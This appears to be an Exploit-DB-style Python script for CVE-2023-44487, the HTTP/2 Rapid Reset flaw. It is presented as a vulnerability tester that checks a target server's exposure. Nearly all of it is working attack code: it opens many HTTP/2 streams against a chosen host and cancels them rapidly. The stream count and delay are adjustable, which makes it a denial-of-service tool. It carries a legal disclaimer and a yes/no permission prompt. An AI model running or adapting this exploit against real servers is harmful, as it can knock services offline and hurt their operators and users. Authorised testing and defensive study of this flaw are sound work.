#!/usr/bin/env python3 """ # Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS) # Google Dork: -NA- # Date: 29th August 2025 # Exploit Author: Madhusudhan Rajappa # Vendor Homepage: -NA- # Software Link: -NA- # Version: HTTP/2.0 # Tested on: -NA- # CVE : CVE-2023-44487 """ import asyncio import ssl import time import argparse import logging from typing import Optional, Tuple import statistics try: import h2.connection import h2.events import h2.exceptions import h2.config except ImportError: print("Error: h2 library not installed. Install with: pip install h2") exit(1) # Configure logging logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s' ) logger = logging.getLogger(__name__) class HTTP2RapidResetTester: """Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability.""" def __init__(self, host: str, port: int = 443, use_ssl: bool = True): self.host = host self.port = port self.use_ssl = use_ssl self.connection = None self.reader = None self.writer = None self.response_times = [] self.errors = [] self.connection_closed = False async def connect(self) -> bool: """Establish HTTP/2 connection to the target server.""" try: logger.info(f"Connecting to {self.host}:{self.port}") if self.use_ssl: ssl_context = ssl.create_default_context() ssl_context.set_alpn_protocols(['h2']) self.reader, self.writer = await asyncio.open_connection( self.host, self.port, ssl=ssl_context ) else: self.reader, self.writer = await asyncio.open_connection(self.host, self.port) # Initialize HTTP/2 connection config = h2.config.H2Configuration(client_side=True) self.connection = h2.connection.H2Connection(config=config) self.connection.initiate_connection() # Send connection preface await self._send_data(self.connection.data_to_send()) logger.info("HTTP/2 connection established successfully") self.connection_closed = False return True except Exception as e: logger.error(f"Failed to establish connection: {e}") return False async def _send_data(self, data: bytes): """Send data to the server.""" if data and self.writer and not self.connection_closed: try: self.writer.write(data) await self.writer.drain() except (ConnectionResetError, BrokenPipeError, OSError) as e: logger.debug(f"Connection error while sending data: {e}") self.connection_closed = True async def _receive_data(self) -> bytes: """Receive data from the server.""" try: if self.connection_closed or not self.reader: return b'' data = await asyncio.wait_for(self.reader.read(65535), timeout=5.0) if not data: self.connection_closed = True return data except asyncio.TimeoutError: return b'' except (ConnectionResetError, BrokenPipeError, OSError) as e: logger.debug(f"Connection error while receiving data: {e}") self.connection_closed = True return b'' async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict: """ Perform the rapid reset attack test. Args: num_streams: Number of streams to create and reset delay: Delay between stream creations (seconds) Returns: Dictionary with test results """ logger.info(f"Starting rapid reset test with {num_streams} streams") start_time = time.time() created_streams = [] reset_streams = [] try: # Phase 1: Rapidly create streams for i in range(num_streams): if self.connection_closed: logger.warning("Connection closed during stream creation") break stream_id = (i * 2) + 1 # Odd numbers for client-initiated streams # Create HTTP/2 headers headers = [ (':method', 'GET'), (':path', '/'), (':scheme', 'https' if self.use_ssl else 'http'), (':authority', self.host), ('user-agent', 'CVE-2023-44487-Tester/1.0'), ] try: # Send headers to create stream self.connection.send_headers(stream_id, headers) await self._send_data(self.connection.data_to_send()) created_streams.append(stream_id) # Small delay to avoid overwhelming the connection if delay > 0: await asyncio.sleep(delay) except Exception as e: self.errors.append(f"Error creating stream {stream_id}: {e}") if "connection" in str(e).lower(): break logger.info(f"Created {len(created_streams)} streams") # Phase 2: Rapidly reset all streams reset_start = time.time() for stream_id in created_streams: if self.connection_closed: logger.warning("Connection closed during stream reset") break try: # Send RST_STREAM frame to cancel the request self.connection.reset_stream(stream_id, error_code=0x8) # CANCEL error code await self._send_data(self.connection.data_to_send()) reset_streams.append(stream_id) if delay > 0: await asyncio.sleep(delay / 10) # Faster resets except h2.exceptions.StreamClosedError: # Stream already closed, continue pass except Exception as e: self.errors.append(f"Error resetting stream {stream_id}: {e}") if "connection" in str(e).lower(): break reset_duration = time.time() - reset_start total_duration = time.time() - start_time logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s") # Phase 3: Monitor server response await self._monitor_server_response(timeout=10.0) return { 'streams_created': len(created_streams), 'streams_reset': len(reset_streams), 'total_duration': total_duration, 'reset_duration': reset_duration, 'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0, 'errors': len(self.errors), 'response_times': self.response_times.copy(), 'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0, 'connection_closed': self.connection_closed } except Exception as e: logger.error(f"Error during rapid reset test: {e}") return {'error': str(e)} async def _monitor_server_response(self, timeout: float = 10.0): """Monitor server responses and measure response times.""" logger.info("Monitoring server responses...") end_time = time.time() + timeout while time.time() < end_time and not self.connection_closed: try: start = time.time() data = await self._receive_data() response_time = time.time() - start if data: self.response_times.append(response_time) try: # Process HTTP/2 events events = self.connection.receive_data(data) for event in events: if isinstance(event, h2.events.ResponseReceived): logger.debug(f"Response received on stream {event.stream_id}") elif isinstance(event, h2.events.StreamReset): logger.debug(f"Stream {event.stream_id} reset by server") elif isinstance(event, h2.events.ConnectionTerminated): logger.warning("Server terminated connection") self.connection_closed = True return except Exception as e: logger.debug(f"Error processing HTTP/2 events: {e}") await asyncio.sleep(0.1) except Exception as e: self.errors.append(f"Error monitoring response: {e}") break async def baseline_test(self, num_requests: int = 10) -> dict: """Perform baseline test with normal HTTP/2 requests.""" logger.info(f"Performing baseline test with {num_requests} normal requests") start_time = time.time() successful_requests = 0 for i in range(num_requests): if self.connection_closed: logger.warning("Connection closed during baseline test") break stream_id = (i * 2) + 1 headers = [ (':method', 'GET'), (':path', '/'), (':scheme', 'https' if self.use_ssl else 'http'), (':authority', self.host), ('user-agent', 'CVE-2023-44487-Baseline/1.0'), ] try: request_start = time.time() self.connection.send_headers(stream_id, headers) self.connection.end_stream(stream_id) await self._send_data(self.connection.data_to_send()) # Wait for response try: data = await asyncio.wait_for(self._receive_data(), timeout=5.0) if data: self.response_times.append(time.time() - request_start) successful_requests += 1 except asyncio.TimeoutError: logger.warning(f"Timeout waiting for response to request {i+1}") await asyncio.sleep(0.1) # Small delay between requests except Exception as e: logger.warning(f"Error in baseline request {i+1}: {e}") if "connection" in str(e).lower(): break total_duration = time.time() - start_time return { 'total_requests': num_requests, 'successful_requests': successful_requests, 'total_duration': total_duration, 'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0, 'success_rate': successful_requests / num_requests if num_requests > 0 else 0 } async def close(self): """Close the connection gracefully.""" if self.writer and not self.connection_closed: try: # Try to close the connection gracefully if self.connection: try: # Send GOAWAY frame if possible self.connection.close_connection() await self._send_data(self.connection.data_to_send()) except Exception as e: logger.debug(f"Error sending GOAWAY frame: {e}") # Close the writer self.writer.close() # Wait for close with timeout to avoid hanging try: await asyncio.wait_for(self.writer.wait_closed(), timeout=2.0) except asyncio.TimeoutError: logger.debug("Timeout waiting for connection to close") except (ConnectionResetError, BrokenPipeError, OSError): # Connection already closed by peer, this is expected pass except Exception as e: logger.debug(f"Error during connection cleanup: {e}") finally: self.connection_closed = True async def main(): parser = argparse.ArgumentParser( description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester', epilog='WARNING: Only use on systems you own or have permission to test!' ) parser.add_argument('host', help='Target hostname') parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)') parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS') parser.add_argument('-s', '--streams', type=int, default=100, help='Number of streams for rapid reset test (default: 100)') parser.add_argument('-d', '--delay', type=float, default=0.001, help='Delay between stream operations (default: 0.001s)') parser.add_argument('--baseline-only', action='store_true', help='Only perform baseline test') parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output') args = parser.parse_args() if args.verbose: logging.getLogger().setLevel(logging.DEBUG) print("=" * 60) print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester") print("=" * 60) print(f"Target: {args.host}:{args.port}") print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}") print() # Legal disclaimer print("LEGAL DISCLAIMER:") print("This tool is for authorized security testing only.") print("Ensure you have permission to test the target system.") print("Unauthorized use may be illegal.") print() response = input("Do you have permission to test this system? (yes/no): ") if response.lower() != 'yes': print("Exiting. Only use this tool on systems you're authorized to test.") return tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl) try: # Connect to target if not await tester.connect(): logger.error("Failed to establish connection. Exiting.") return # Perform baseline test print("\n" + "="*40) print("BASELINE TEST") print("="*40) baseline_results = await tester.baseline_test() print(f"Baseline Results:") print(f" Total Requests: {baseline_results['total_requests']}") print(f" Successful: {baseline_results['successful_requests']}") print(f" Success Rate: {baseline_results['success_rate']:.2%}") print(f" Avg Response Time: {baseline_results['avg_response_time']:.3f}s") print(f" Total Duration: {baseline_results['total_duration']:.3f}s") if not args.baseline_only: # Reset connection for rapid reset test await tester.close() tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl) if not await tester.connect(): logger.error("Failed to re-establish connection for rapid reset test.") return # Perform rapid reset test print("\n" + "="*40) print("RAPID RESET TEST (CVE-2023-44487)") print("="*40) print(f"Testing with {args.streams} streams...") rapid_results = await tester.rapid_reset_test(args.streams, args.delay) if 'error' in rapid_results: print(f"Test failed: {rapid_results['error']}") else: print(f"Rapid Reset Results:") print(f" Streams Created: {rapid_results['streams_created']}") print(f" Streams Reset: {rapid_results['streams_reset']}") print(f" Reset Rate: {rapid_results['reset_rate']:.1f} resets/second") print(f" Total Duration: {rapid_results['total_duration']:.3f}s") print(f" Reset Duration: {rapid_results['reset_duration']:.3f}s") print(f" Errors: {rapid_results['errors']}") print(f" Avg Response Time: {rapid_results['avg_response_time']:.3f}s") if rapid_results.get('connection_closed'): print(f" Connection Status: Server closed connection during test") # Analysis print("\n" + "="*40) print("VULNERABILITY ANALYSIS") print("="*40) if rapid_results.get('connection_closed'): print("Server closed connection during rapid reset test") print(" This could indicate protective measures or resource exhaustion.") if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8: print("WARNING: Server may have rejected many reset requests") print(" This could indicate protective measures are in place.") if rapid_results['reset_rate'] > 1000: print("HIGH RISK: Server accepts very high reset rates") print(" This may indicate vulnerability to CVE-2023-44487") elif rapid_results['reset_rate'] > 100: print("MEDIUM RISK: Server accepts moderate reset rates") print(" Further testing may be needed") else: print("LOWER RISK: Server has rate limiting on resets") print(" This suggests some protection against the vulnerability") if len(tester.errors) > rapid_results['streams_created'] * 0.1: print("Many errors occurred during testing") print(" Results may not be reliable") except KeyboardInterrupt: print("\nTest interrupted by user") except Exception as e: logger.error(f"Unexpected error: {e}") finally: try: await tester.close() except Exception as e: logger.debug(f"Error during final cleanup: {e}") print("\nTest completed.") if __name__ == "__main__": print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester") print("Requires: pip install h2") print() try: asyncio.run(main()) except KeyboardInterrupt: print("\nExiting...") except Exception as e: logger.error(f"Fatal error: {e}")